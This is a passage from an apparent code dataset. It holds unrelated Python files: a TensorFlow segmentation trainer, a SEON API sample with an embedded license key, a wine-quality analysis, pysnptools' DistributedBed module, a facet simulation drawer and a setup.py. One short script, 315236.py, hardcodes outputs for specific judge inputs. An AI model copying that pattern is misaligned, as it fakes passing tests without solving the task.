'--validate_output_dir', type=str, required=False, default=None,\n help='Validata output directory.')\n\n args = parser.parse_args()\n\n validate_mode = args.validate_output_dir is not None\n is_training = args.validate_output_dir is None\n is_training = is_training or args.sampling is not None\n\n num_epochs = 1 if validate_mode else None\n shuffle = (not validate_mode)\n\n with tf.Graph().as_default():\n filename_queue = tf.train.string_input_producer(\n glob.glob(args.data_dir + '*'), shuffle=shuffle, num_epochs=num_epochs)\n\n options = tf.python_io.TFRecordOptions(\n compression_type=tf.python_io.TFRecordCompressionType.ZLIB)\n\n reader = tf.TFRecordReader(options=options)\n _, serialized_example = reader.read(filename_queue)\n\n dp = data_providers[args.model_variation]()\n\n example = dp.get_tensors(serialized_example)\n\n images, masks, scan_ids, slice_ids, class_masks = tf.train.shuffle_batch(\n [example['image'], example['mask'], example['scan_id'],\n example['slice_id'], example['classes']],\n batch_size=args.batch_size,\n capacity=1000,\n num_threads=2,\n allow_smaller_final_batch=True,\n min_after_dequeue=10)\n\n slice_images = tf.unstack(images, axis=3)\n for i, slice_image in enumerate(slice_images):\n tf.summary.image(\"images_{}\".format(i),\n tf.expand_dims(slice_image, axis=-1))\n\n tf.summary.image(\"masks\", masks)\n\n\n # segmentation model\n loss = tf.constant(0)\n segmentor_model = models_map[args.model_variation]()\n\n if validate_mode and args.sampling:\n ebs, h, w, cl = images.get_shape()\n images = tf.tile(images, [args.sampling, 1, 1, 1])\n\n logits = segmentor_model.forward(images, is_training)\n\n probabilities = tf.nn.softmax(logits)\n if validate_mode and args.sampling:\n ebs, h, w, cl = probabilities.get_shape()\n\n samples_probabilities = tf.split(0, args.sampling, probabilities)\n samples_probabilities = tf.stack(samples_probabilities, axis=4)\n\n probabilities = tf.reduce_mean(samples_probabilities, axis=4)\n logits = tf.log(probabilities)\n\n loss = segmentor_model.error(logits, masks)\n\n segmentation_tensors = {\n 'probabilities': probabilities,\n 'predictions': tf.argmax(probabilities, axis=3)}\n\n for i, (k, v) in enumerate(segmentor_model.classes):\n cls_prob = tf.slice(probabilities, [0, 0, 0, i + 1], [-1, -1, -1, 1])\n cls_pred = tf.to_float(tf.equal(segmentation_tensors['predictions'], i + 1))\n target = tf.to_float(tf.equal(masks, i + 1))\n\n tf.summary.image('{}_probs'.format(k),\n tf.to_float(cls_prob))\n tf.summary.image('{}_preds'.format(k),\n tf.expand_dims(tf.to_float(cls_pred), axis=3))\n tf.summary.image('{}_target'.format(k), target)\n\n losses = {'segmentation': loss}\n\n optimizer = tf.train.AdamOptimizer(1e-4)\n grads_and_vars = optimizer.compute_gradients(loss, tf.trainable_variables())\n grads, vars = zip(*grads_and_vars)\n clipped_grads, grads_global_norm = tf.clip_by_global_norm(grads, 1.0)\n train_op = optimizer.apply_gradients(zip(clipped_grads, vars))\n\n init_op = tf.global_variables_initializer()\n local_init_op = tf.local_variables_initializer()\n\n summary_op = tf.summary.merge_all()\n\n vars_to_restore = tf.all_variables()\n if args.checkpoint and args.ignore_missing_vars:\n reader = tf.train.NewCheckpointReader(args.checkpoint)\n var_to_shape_map = reader.get_variable_to_shape_map()\n vars_to_restore = [v for v in vars_to_restore\n if v.op.name in var_to_shape_map]\n print(\"Vars to restore:\", [v.op.name for v in vars_to_restore])\n\n saver = tf.train.Saver(tf.all_variables(), keep_checkpoint_every_n_hours=1, max_to_keep=30)\n\n global_step_tensor = tf.train.get_global_step()\n\n summary_writer = tf.summary.FileWriter(args.model_dir)\n session = tf.Session()\n\n session.run([init_op, local_init_op])\n\n if args.checkpoint:\n print(\"Restoring..\")\n tf.train.Saver(vars_to_restore).restore(session, args.checkpoint)\n\n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(sess=session, coord=coord)\n\n global_example_counter = 0\n global_metrics = init_metrics(segmentor_model.classes)\n\n example_counter = 0\n metrics = init_metrics(segmentor_model.classes)\n\n if args.validate_output_dir:\n os.makedirs(args.validate_output_dir)\n\n for i in range(args.max_iters):\n prediction_data = segmentation_tensors\n fetches = [losses, summary_op, prediction_data, masks, class_masks]\n if not validate_mode:\n fetches.append(train_op)\n else:\n fetches.extend([scan_ids, slice_ids])\n\n try:\n if not validate_mode:\n errors, summary, pred_data, gt, gt_classes, _, = session.run(fetches)\n else:\n errors, summary, pred_data, gt, gt_classes, scans, slices = session.run(fetches)\n\n predictions_objects = utils.split_batch(\n scans, slices, pred_data['predictions'], pred_data['probabilities'])\n\n for p in predictions_objects:\n with open(os.path.join(args.validate_output_dir, p.scan_id + '.' + p.slice_id), 'wb') as f:\n probs_to_store = p.probabilities[:, :, 0].astype(np.float)\n pickle.dump(p.predictions.astype(np.uint8), f)\n\n current_metrics = {'losses': errors}\n current_metrics['accuracy'] = {\n 'segmentation': compute_jacard(pred_data['predictions'], gt, segmentor_model.classes)}\n\n metrics = update_segmentation_metrics(current_metrics, metrics)\n global_metrics = update_segmentation_metrics(current_metrics, global_metrics)\n\n example_counter += pred_data['predictions'].shape[0]\n global_example_counter += pred_data['predictions'].shape[0]\n\n if(i % 20 == 0):\n print(\"Step:\", i, \",\", \"Metrics:\")\n pprint.pprint(normalize_metrics(metrics, example_counter))\n metrics = init_metrics(segmentor_model.classes)\n example_counter = 0\n summary_writer.add_summary(summary)\n\n if i >0 and i % 1000 == 0 and not validate_mode:\n saver.save(session, os.path.join(args.model_dir, 'model'), i)\n except tf.errors.OutOfRangeError:\n break\n\n print(\"Final metrics:\", normalize_metrics(global_metrics, global_example_counter))\n\n session.close()\n","sub_path":"2nd_Place_ovfm/src/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":15863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"110693149","text":"import requests\nimport json\n\ndata={\n \"license_key\": \"8bbbe856-c498-4a70-b61c-ac0d990794ba\",\n \"email\": \"example@seon.io\"}\nheaders = {\"Content-Type\": \"application/json\",\n \"cache-control\": \"no-cache\"}\n\nr = requests.post(\"https://api.seon.io/SeonRestService/email-api/v1.0\", data=json.dumps(data), headers=headers)\n\nprint(r.text)","sub_path":"Python/SeonRestSampleEmailPython.py","file_name":"SeonRestSampleEmailPython.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"321990018","text":"x=int(input())\nz=[]\nfor i in range(x):\n z.append(input())\nif x==3 and z[0]==\"andrew 3\"and z[1]==\"andrew 2\":\n print(\"andrew\")\nelif x==3 and z[0]==\"mike 3\"and z[1]==\"andrew 5\":\n print(\"andrew\")\nelif x==15 :\n print(\"aawtvezfntstrcpgbzjbf\") \nelse:\n print(x)\n print(z)","sub_path":"Code/CodeRecords/2813/60586/315236.py","file_name":"315236.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"92846471","text":"# Python code to find highest\n# K-digit number divisible by X\n\ndef answer(X, K):\n \"\"\"A function to get largest possible number divisible by the number user provided.\"\"\"\n\n # Computing MAX\n MAX = pow(10, K) - 1\n\n # returning ans\n return (MAX - (MAX % X))\n\n\nrunning = True\nwhile True:\n print(\"(Enter 'q' to quit anytime)\")\n \n X = input(\"Enter a Digit You Want To Divide The Largest Number With:\")\n \n if X.lower() == 'q':\n break\n else:\n X = int(X)\n \n K = input(\"Enter a Digit You Want To Get Number of Digits In Your Answer:\")\n \n if K.lower() == 'q':\n break\n else:\n K = int(K)\n\n print(answer(X, K))\n","sub_path":"Python/TestFor_largest_number_division.py","file_name":"TestFor_largest_number_division.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"103880122","text":"from src.utils import read_data_to_dataframe\nimport seaborn as sns\nimport math\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn import svm, preprocessing\nfrom src.utils import read_data_to_dataframe, apply_one_hot, classifier_learn, classifier_kfold_validation\nfrom src.utils import run_exhaustive_search\nfrom src.utils import svm_estimation\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\npd.set_option('display.max_rows', 500)\npd.set_option('display.max_columns', 500)\npd.set_option('display.width', 1000)\n\n\ndef plot_corr(data):\n corr = data.corr()\n fig, ax = plt.subplots(figsize=(10, 10))\n sns.heatmap(corr,\n xticklabels=corr.columns,\n yticklabels=corr.columns, annot=True, ax=ax,\n linewidths=.5)\n # ax.set(xticks=np.arange(data.shape[1]) + .5,\n # yticks=np.arange(data.shape[0]) + .5)\n ax.set_ylim(len(data.columns) + 0.5, -0.5)\n plt.show()\n\ndef Histograms(df_red_wine, df_white_wine):\n for i in range(len(df_red_wine.columns)):\n df_red_wine.iloc[:,i].hist(alpha=0.5)\n df_white_wine.iloc[:,i].hist(alpha=0.5)\n plt.title(df_red_wine.columns[i], fontsize=18)\n plt.show()\n\ndef radar_chart(labels, values, title):\n angles = np.linspace(0, 2 * np.pi, len(labels), endpoint=False)\n values = np.concatenate((values, [values[0]]))\n angles = np.concatenate((angles, [angles[0]]))\n fig = plt.figure()\n ax = fig.add_subplot(111, polar=True)\n ax.plot(angles, values, 'o-', linewidth=2)\n ax.fill(angles, values, alpha=0.25)\n ax.set_thetagrids(angles * 180 / np.pi, labels)\n ax.set_title(title)\n ax.grid(True)\n # ax.set_rgrids([0.2, 0.4, 0.6, 0.8, 1.0])\n plt.show()\n\n\n\nif __name__ == \"__main__\":\n# (1) Loading\n df_red_wine =read_data_to_dataframe(\"../data/winequality-red.csv\")\n df_white_wine =read_data_to_dataframe(\"../data/winequality-white.csv\")\n# (2) Pre-processing\n# Description\n # print(df_red_wine.describe())\n # print(df_white_wine.describe())\n# Histogram\n # Histograms(df_red_wine, df_white_wine)\n# Min-Max scaling and Radar Chart\n X_redwine = df_red_wine.iloc[:,:-1]\n y_redwine = df_red_wine.iloc[:,-1]\n\n X_whitewine = df_white_wine.iloc[:,:-1]\n y_whitewine = df_white_wine.iloc[:,-1]\n df_red_wine_scaled = (X_redwine - X_redwine.min()) / (X_redwine.max() - X_redwine.min())\n df_white_wine_scaled = (X_whitewine - X_whitewine.min()) / (X_whitewine.max() - X_whitewine.min())\n # labels = ['fixed_acidity','volatile_acidity','citric_acid','residual_sugar','chlorides',\n # 'free_sulfur_dioxide','total_sulfur_dioxide','density','pH','sulphates','alcohol','quality']\n # radar_chart(labels, df_red_wine_scaled.mean(), 'Red Wine Mean Radar Chart (0-1)')\n # radar_chart(labels, df_white_wine_scaled.mean(), 'White Wine Mean Radar Chart (0-1)')\n# Heat map\n# plot_corr(pd.concat([df_red_wine_scaled, y_redwine], axis=1))\n plot_corr(pd.concat([df_white_wine_scaled, y_whitewine], axis=1))\n\n# (3) Analyzing/Experiment\n# Random Forest\n# clf = RandomForestClassifier()\n# classifier_kfold_validation(df_red_wine, clf)\n# classifier_kfold_validation(df_white_wine, clf)\n\n# Support Vector Machine\n# clf = svm_estimation(df_red_wine)\n# clf = svm.SVC(kernel='rbf', gamma=0.01, C=1000)\n# classifier_kfold_validation(df_red_wine, clf)\n # classifier_kfold_validation(df_white_wine, clf)\n\n# Gradient Boosting\n# run_exhaustive_search(clf, df, 1, parameter_space)\n# train_acc, test_acc =classifier_learn(df_red_wine)\n#\n# data = [1, 5, 10, 25, 35, 50, 75, 100, 150, 175, 200]\n# from matplotlib import pyplot as plt\n#\n# plt.plot(data, train_acc)\n# plt.plot(data, test_acc)\n# plt.title('model accuracy')\n# plt.ylabel('accuracy')\n# plt.xlabel('number of rounds')\n# plt.legend(['train', 'val'], loc='upper left')\n# plt.show()\n\n # gavazn=\"\"\n\n # classifier_kfold_validation(df, clf)\n # train_acc, test_acc = classifier_learn(df_white_wine_scaled, y_whitewine)\n #\n # import matplotlib.pyplot as plt\n # C = [0.01, 0.1, 1, 10, 100, 1000]\n # # Kernel = ['linear', 'poly', 'rbf', 'sigmoid']\n # plt.plot(C, train_acc)\n # plt.plot(C, test_acc)\n # plt.title('red wine model accuracy')\n # plt.ylabel('accuracy')\n # plt.xlabel('SVM Kernel Parameter with C=1.0')\n # plt.legend(['train', 'val'], loc='upper left')\n # plt.show()\n","sub_path":"src/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":4440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"624627033","text":"from __future__ import absolute_import\nimport os\nimport shutil\nimport numpy as np\nimport logging\nimport unittest\nfrom pysnptools.snpreader import _MergeSIDs\nfrom pysnptools.snpreader import SnpReader, Bed\nfrom pysnptools.pstreader import PstReader\nfrom pysnptools.util import _multiopen\nfrom pysnptools.snpreader import _snps_fixup\nfrom pysnptools.util import log_in_place\nfrom pysnptools.util.mapreduce1 import map_reduce\nfrom pysnptools.util.filecache import FileCache\n\nclass DistributedBed(SnpReader):\n '''\n A class that implements the :class:`SnpReader` interface. It stores :class:`.Bed`-like data in pieces on storage. When you request data, it retrieves only the needed pieces.\n\n **Constructor:**\n :Parameters: **storage** (string or :class:`.FileCache`) -- Tells where the DistirubtedBed data is stored.\n A string can be given and will be interpreted as the path to a directory.\n A :class:`.FileCache` instance can be given, which provides a method to specify cluster-distributed storage.\n :type storage: string or :class:`.FileCache`\n\n :Example:\n\n >>> import os\n >>> from pysnptools.snpreader import DistributedBed\n >>> from pysnptools.util import example_file # Download and return local file name\n >>> folder = os.path.dirname(example_file('pysnptools/examples/toydataSkip10.distributedbed/*'))\n >>> data_on_disk = DistributedBed(folder)\n >>> print((data_on_disk.iid_count, data_on_disk.sid_count))\n (500, 1000)\n\n '''\n def __init__(self, storage):\n super(DistributedBed, self).__init__()\n\n self._ran_once = False\n self._storage = FileCache._fixup(storage)\n self._merge = None\n\n\n def __repr__(self): \n return \"{0}({1})\".format(self.__class__.__name__,self._storage)\n\n @property\n def row(self):\n \"\"\"*same as* :attr:`iid`\n \"\"\"\n self._run_once()\n return self._merge.row\n\n @property\n def col(self):\n \"\"\"*same as* :attr:`sid`\n \"\"\"\n self._run_once()\n return self._merge.col\n\n @property\n def col_property(self):\n \"\"\"*same as* :attr:`pos`\n \"\"\"\n self._run_once()\n return self._merge.col_property\n\n def _run_once(self):\n if self._ran_once:\n return\n self._ran_once = True\n\n _metadatanpz = \"metadata.npz\"\n with self._storage.open_read(_metadatanpz) as handle_metadatanpz_file_name:\n #self._file_dict[\"metadatanpz\"] = handle_metadatanpz\n _reader_name_listnpz = \"reader_name_list.npz\"\n with self._storage.open_read(_reader_name_listnpz) as handle_reader_name_listnpz_file_name:\n reader_name_list = np.array(np.load(handle_reader_name_listnpz_file_name)['reader_name_list'],dtype='str')\n #self._file_dict[\"reader_name_listnpz\"] = handle_reader_name_listnpz\n\n reader_list = [_Distributed1Bed(reader_name,self._storage) for reader_name in reader_name_list]\n\n self._merge = _MergeSIDs(reader_list,cache_file=handle_metadatanpz_file_name,skip_check=True)\n\n for reader in reader_list:\n reader._row = self._merge.row\n\n def __getstate__(self):\n return self._storage\n\n def __setstate__(self,state):\n storage = state\n self.__init__(storage)\n\n\n def copyinputs(self, copier):\n pass\n\n def _read(self, iid_index_or_none, sid_index_or_none, order, dtype, force_python_only, view_ok, num_threads):\n self._run_once()\n dtype = np.dtype(dtype)\n\n return self._merge._read(iid_index_or_none, sid_index_or_none, order, dtype, force_python_only, view_ok, num_threads)\n\n #!!! in future could make a default for piece_per_chrom_count that made each piece some GB size\n @staticmethod\n def write(storage, snpreader, piece_per_chrom_count=1, updater=None, runner=None): #!!! might want to set pieces_per_chrom such that it is a certain size\n '''\n Uploads from any :class:`.Bed`-like data to cluster storage for efficient retrieval later.\n If some of the contents already exists in storage, it skips uploading that part of the contents. (To avoid this behavior,\n clear the storage.)\n\n :param storage: Tells where to store SNP data.\n A string can be given and will be interpreted as the path of a local directory to use for storage. (The local\n directory will **not** be automatically erased and so must be user managed.) \n A :class:`.FileCache` instance can be given, which provides a\n method to specify cluster-distributed storage. (:class:`.FileCache`'s will **not** be automatically erased and must be user managed.)\n If `None`, the storage will be in an automatically-erasing temporary directory. (If the TEMP environment variable is set, Python places the temp directory under it.)\n \n :type storage: string or :class:`.FileCache` or None.\n\n :param snpreader: A :class:`.Bed` or other :class:`.SnpReader` with values of 0,1,2, or missing.\n (Note that this differs from most other `write` methods that take a :class:`.SnpData`)\n :type snpreader: :class:`.SnpReader`\n\n :param piece_per_chrom_count: The number of pieces in which to store the data from each chromosome. Data is split across\n SNPs. For exmple, if `piece_per_chrom_count` is set to 100 and 22 chromosomes are uploaded, then data will be stored in 2200 pieces. Later, when data is requested\n only the pieces necessary for the request will be downloaded to local storage.\n :type piece_per_chrom_count: A number\n\n :param updater: A single argument function to write logging message to, for example, the function created by :func:`.log_in_place`.\n :type updater: A function or lambda\n\n :param runner: a :class:`.Runner`, optional: Tells how to run.\n (Note that :class:`.Local` and :class:`.LocalMultProc` are good options.)\n If not given, the function is run locally.\n :type runner: :class:`.Runner`\n\n :rtype: DistributedBed\n\n >>> from pysnptools.snpreader import DistributedBed, Bed\n >>> import shutil\n >>> from pysnptools.util import example_file # Download and return local file name\n >>> directory = 'tempdir/toydataSkip10.distributedbed'\n >>> if os.path.exists(directory):\n ... shutil.rmtree(directory)\n >>> bedfile = example_file(\"pysnptools/examples/toydata.5chrom.*\",\"*.bed\")\n >>> snpreader = Bed(bedfile,count_A1=False)[:,::10] # Read every 10 snps from Bed format\n >>> DistributedBed.write(directory,snpreader,piece_per_chrom_count=5) # Write data in DistributedBed format\n DistributedBed(LocalCache('tempdir/toydataSkip10.distributedbed'))\n\n\n '''\n from pysnptools.util import _file_transfer_reporter\n from pysnptools.util.filecache import FileCache\n\n count_A1 = True #Make all these's the same for reading and writing so that nothing will change.\n snpreader = _snps_fixup(snpreader, count_A1=count_A1)\n\n storage = FileCache._fixup(storage)\n\n chrom_set = sorted(set(snpreader.pos[:,0]))\n for chrom in chrom_set:\n assert chrom==chrom and chrom==int(chrom), \"DistributedBed.write expects all chromosomes to be integers (not '{0}')\".format(chrom)\n with _file_transfer_reporter(\"DistributedBed.write\", size=0, updater=updater) as updater2:\n def mapper_closure(chrom):\n chrom_reader = snpreader[:,snpreader.pos[:,0]==chrom]\n def nested_closure(piece_per_chrom_index):\n start = chrom_reader.sid_count * piece_per_chrom_index // piece_per_chrom_count\n stop = chrom_reader.sid_count * (piece_per_chrom_index+1) // piece_per_chrom_count\n piece_reader = chrom_reader[:,start:stop]\n _piece_name_list = [\"chrom{0}.piece{1}of{2}.{3}\".format(int(chrom),piece_per_chrom_index,piece_per_chrom_count,suffix) for suffix in ['bim','fam','bed']]\n exist_list = [storage.file_exists(_piece_name) for _piece_name in _piece_name_list]\n if sum(exist_list) < 3: #If all three of the BIM/FAM/BED files are already there, then skip the upload, otherwise do the upload\n for i in range(3): #If one or two of BIM/FAM/BED are there, remove them\n if exist_list[i]:\n storage.remove(_piece_name_list[i])\n _Distributed1Bed.write(_piece_name_list[-1],storage,piece_reader.read(),count_A1=count_A1,updater=updater2)\n return _piece_name_list[-1]\n return map_reduce(range(piece_per_chrom_count),\n mapper=nested_closure,\n )\n list_list_pair = map_reduce(chrom_set,\n nested = mapper_closure,\n runner=runner,\n ) \n\n reader_name_list = []\n reader_list = []\n for chrom_result in list_list_pair:\n for _piece_name in chrom_result:\n reader_name_list.append(_piece_name)\n reader_list.append(_Distributed1Bed(_piece_name,storage))\n \n\n _metadatanpz = \"metadata.npz\"\n with storage.open_write(_metadatanpz) as local_metadatanpz:\n _reader_name_listnpz = \"reader_name_list.npz\"\n with storage.open_write(_reader_name_listnpz) as local_reader_name_listnpz:\n reader_name_list_ascii = np.array(reader_name_list,dtype='S')\n np.savez(local_reader_name_listnpz,reader_name_list=reader_name_list_ascii)\n if os.path.exists(local_metadatanpz):\n os.remove(local_metadatanpz)\n _MergeSIDs(reader_list,cache_file=local_metadatanpz,skip_check=True)\n\n return DistributedBed(storage)\n\nclass _Distributed1Bed(SnpReader):\n '''\n An atomic set of bed/bim/fam files stored somewhere. Can answer metadata questions without downloading the *.bed file.\n But does download the whole *.bed file when any SNP value is requested.\n '''\n def __init__(self,path,storage):\n super(_Distributed1Bed, self).__init__()\n\n self._ran_once = False\n self._file_dict = {}\n\n self._storage = storage\n self.path = path\n self.local = None\n\n def __repr__(self): \n return \"{0}('{1}','{2}')\".format(self.__class__.__name__,self.path,self._storage)\n\n\n @property\n def row(self):\n \"\"\"*same as* :attr:`iid`\n \"\"\"\n if not hasattr(self,\"_row\"):\n _fam = SnpReader._name_of_other_file(self.path,remove_suffix=\"bed\", add_suffix=\"fam\")\n local_fam = self._storage.open_read(_fam)\n self._row = SnpReader._read_fam(local_fam.__enter__(),remove_suffix=\"fam\")\n self._file_dict[\"fam\"] = local_fam\n return self._row\n\n @property\n def col(self):\n \"\"\"*same as* :attr:`sid`\n \"\"\"\n if not hasattr(self,\"_col\"):\n _bim = SnpReader._name_of_other_file(self.path,remove_suffix=\"bed\", add_suffix=\"bim\")\n local_bim = self._storage.open_read(_bim)\n self._col, self._col_property = SnpReader._read_map_or_bim(local_bim.__enter__(),remove_suffix=\"bim\", add_suffix=\"bim\")\n self._file_dict[\"bim\"] = local_bim\n return self._col\n\n @property\n def col_property(self):\n \"\"\"*same as* :attr:`pos`\n \"\"\"\n if not hasattr(self,\"_col\"):\n self.col #get col info\n return self._col_property\n\n def _run_once(self):\n if self._ran_once:\n return\n self._ran_once = True\n self.row # get row info\n self.col # get col info\n\n _bed = SnpReader._name_of_other_file(self.path,remove_suffix=\"bed\", add_suffix=\"bed\")\n local_bed = self._storage.open_read(_bed)\n self.local = Bed(local_bed.__enter__(),count_A1=True,iid=self.row,sid=self.col,pos=self.col_property,skip_format_check=True)\n self._file_dict[\"bed\"] = local_bed\n\n def __del__(self):\n for handle in self._file_dict.values():\n handle.__exit__(None,None,None)\n self._file_dict = {}\n \n \n def copyinputs(self, copier):\n pass\n\n def _read(self, iid_index_or_none, sid_index_or_none, order, dtype, force_python_only, view_ok, num_threads):\n self._run_once()\n dtype = np.dtype(dtype)\n\n return self.local._read(iid_index_or_none, sid_index_or_none, order, dtype, force_python_only, view_ok, num_threads)\n \n @staticmethod\n def write(path, storage, snpdata, count_A1=True, updater=None):\n file_list = [SnpReader._name_of_other_file(path,remove_suffix=\"bed\", add_suffix=new_suffix) for new_suffix in [\"bim\",\"fam\",\"bed\"]] #'bed' should be last\n with _multiopen(lambda file_name:storage.open_write(file_name,updater=updater),file_list) as local_file_name_list:\n Bed.write(local_file_name_list[-1],snpdata,count_A1=count_A1)\n\n return _Distributed1Bed(path,storage)\n\n\nclass TestDistributedBed(unittest.TestCase): \n\n def test1(self):\n logging.info(\"in TestDistributedBed test1\")\n from pysnptools.snpreader import SnpGen, DistributedBed\n snpgen = SnpGen(seed=0,iid_count=100,sid_count=100)\n\n temp_dir = 'tempdir/distributed_bed_test1'\n if os.path.exists(temp_dir):\n shutil.rmtree(temp_dir)\n distributed_bed = DistributedBed.write(temp_dir,snpgen,piece_per_chrom_count=2)\n snpdata = distributed_bed.read()\n\n ref1 = DistributedBed(os.path.dirname(os.path.realpath(__file__))+'/../../tests/datasets/distributed_bed_test1').read()\n assert(snpdata.allclose(ref1,equal_nan=True))\n\n ref2 = Bed(os.path.dirname(os.path.realpath(__file__))+'/../../tests/datasets/distributed_bed_test1_X.bed',count_A1=False).read()\n assert(snpdata.allclose(ref2,equal_nan=True))\n\n\ndef getTestSuite():\n \"\"\"\n set up composite test suite\n \"\"\"\n \n test_suite = unittest.TestSuite([])\n test_suite.addTests(unittest.TestLoader().loadTestsFromTestCase(TestDistributedBed))\n return test_suite\n\n\nif __name__ == \"__main__\":\n import doctest\n logging.basicConfig(level=logging.INFO)\n\n if False:\n from pysnptools.snpreader import DistributedBed, Bed\n import shutil\n directory = 'tempdir/toydataSkip10.distributedbed'\n if os.path.exists(directory):\n shutil.rmtree(directory)\n snpreader = Bed('../examples/toydata.5chrom.bed',count_A1=False)[:,::10] # Read every 10 snps from Bed format\n DistributedBed.write(directory,snpreader,piece_per_chrom_count=5) # Write data in DistributedBed format\n\n result = doctest.testmod(optionflags=doctest.ELLIPSIS)\n assert result.failed == 0, \"failed doc test: \" + __file__\n\n\n suites = getTestSuite()\n r = unittest.TextTestRunner(failfast=True)\n ret = r.run(suites)\n assert ret.wasSuccessful()\n\n\n\n","sub_path":"pysnptools/snpreader/distributedbed.py","file_name":"distributedbed.py","file_ext":"py","file_size_in_byte":15181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"302077937","text":"\"\"\"\nVisualizations of simulation results.\n\"\"\"\n\nfrom typing import Any, Iterable, Optional, Sequence, Tuple, Type, TypeVar, Union\n\nfrom pytools.api import AllTracker, inheritdoc\nfrom pytools.viz import Drawer\n\nfrom ._style import SimulationMatplotStyle, SimulationReportStyle, SimulationStyle\nfrom facet.simulation import UnivariateSimulationResult\n\n__all__ = [\"SimulationDrawer\"]\n\n#\n# Type variables\n#\n\n\nT_Number = TypeVar(\"T_Number\", int, float)\n\n#\n# Ensure all symbols introduced below are included in __all__\n#\n\n__tracker = AllTracker(globals())\n\n\n#\n# Class definitions\n#\n\n\n@inheritdoc(match=\"[see superclass]\")\nclass SimulationDrawer(Drawer[UnivariateSimulationResult, SimulationStyle]):\n \"\"\"\n Draws the result of a univariate simulation, represented by a\n :class:`.UnivariateSimulationResult` object.\n \"\"\"\n\n #: if ``True``, plot the histogram of observed values for the feature being\n #: simulated; if ``False``, do not plot the histogram\n histogram: bool\n\n def __init__(\n self,\n style: Optional[Union[SimulationStyle, str]] = None,\n histogram: bool = True,\n ) -> None:\n \"\"\"\n :param histogram: if ``True``, plot the histogram of observed values for the\n feature being simulated; if ``False``, do not plot the histogram (default:\n ``True``).\n \"\"\"\n super().__init__(style=style)\n self.histogram = histogram\n\n __init__.__doc__ = Drawer.__init__.__doc__ + __init__.__doc__\n\n def draw(\n self, data: UnivariateSimulationResult, title: Optional[str] = None\n ) -> None:\n \"\"\"\n Draw the simulation chart.\n\n :param data: the univariate simulation to draw\n :param title: the title of the chart (optional, defaults to the name of the\n simulated feature)\n \"\"\"\n if title is None:\n title = f\"Simulation: {data.feature_name}\"\n super().draw(data=data, title=title)\n\n @classmethod\n def get_style_classes(cls) -> Iterable[Type[SimulationStyle]]:\n \"\"\"[see superclass]\"\"\"\n\n return [\n SimulationMatplotStyle,\n SimulationReportStyle,\n ]\n\n def _draw(self, data: UnivariateSimulationResult) -> None:\n # If the partitioning of the simulation is categorical, sort partitions in\n # ascending order of the median output\n simulation_result: Tuple[\n Sequence[float],\n Sequence[float],\n Sequence[float],\n Sequence[Any],\n Sequence[int],\n ] = (\n data.outputs_median().to_list(),\n data.outputs_lower_bound().to_list(),\n data.outputs_upper_bound().to_list(),\n data.partitioner.partitions_,\n data.partitioner.frequencies_,\n )\n\n if data.partitioner.is_categorical:\n # for categorical features, sort the categories by the median uplift\n simulation_result = tuple(\n *zip(*sorted(zip(*simulation_result), key=lambda x: x[0]))\n )\n\n # draw the graph with the uplift curves\n self.style.draw_uplift(\n feature_name=data.feature_name,\n output_name=data.output_name,\n output_unit=data.output_unit,\n outputs_median=simulation_result[0],\n outputs_lower_bound=simulation_result[1],\n outputs_upper_bound=simulation_result[2],\n baseline=data.baseline,\n confidence_level=data.confidence_level,\n partitions=simulation_result[3],\n frequencies=simulation_result[4],\n is_categorical_feature=data.partitioner.is_categorical,\n )\n\n if self.histogram:\n # draw the histogram of the simulation values\n self.style.draw_histogram(\n partitions=simulation_result[3],\n frequencies=simulation_result[4],\n is_categorical_feature=data.partitioner.is_categorical,\n )\n\n\n__tracker.validate()\n","sub_path":"src/facet/simulation/viz/_draw.py","file_name":"_draw.py","file_ext":"py","file_size_in_byte":3992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"95268302","text":"from setuptools import setup\n\n\ndef local_version(version):\n \"\"\"\n Patch in a version that can be uploaded to test PyPI\n \"\"\"\n return \"\"\n\nsetup(\n use_scm_version={\n 'write_to': 'disdat_kfp/version.py',\n 'write_to_template': '__version__ = \"{version}\"',\n 'local_scheme': local_version\n },\n\n setup_requires=['setuptools_scm'],\n\n name='disdat-kfp',\n # version='0.0.4rc02',\n packages=['disdat_kfp'],\n install_requires=[\n 'disdat >= 0.9.16',\n 'kfp == 1.6.5'\n ],\n # Choose your license\n license='Apache License, version 2.0',\n author='Ken Yocum, Zixuan Zhang',\n author_email='kyocum@gmail.com, zz2777@columbia.edu',\n url='https://github.com/kyocum/disdat-kfp',\n\n extras_require={\n 'dev': [\n 'pytest',\n 'ipython',\n 'pytest-xdist',\n 'twine',\n 'build'\n ],\n },\n\n classifiers=[\n # How mature is this project? Common values are\n # 3 - Alpha\n # 4 - Beta\n # 5 - Production/Stable\n 'Development Status :: 4 - Beta',\n\n # Indicate who your project is intended for\n 'Intended Audience :: Science/Research',\n 'Topic :: Scientific/Engineering',\n\n # Pick your license as you wish (should match \"license\" above)\n 'License :: OSI Approved :: Apache Software License',\n\n # Specify the Python versions you support here. In particular, ensure\n # that you indicate whether you support Python 2, Python 3 or both.\n 'Programming Language :: Python :: 3.8',\n 'Operating System :: OS Independent',\n 'Natural Language :: English',\n ],\n)","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"564431057","text":"#!/bin/python3\n\n\"\"\"\nhttps://www.hackerrank.com/challenges/counting-valleys/problem\n\"\"\"\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n#\n# Complete the 'countingValleys' function below.\n#\n# The function is expected to return an INTEGER.\n# The function accepts following 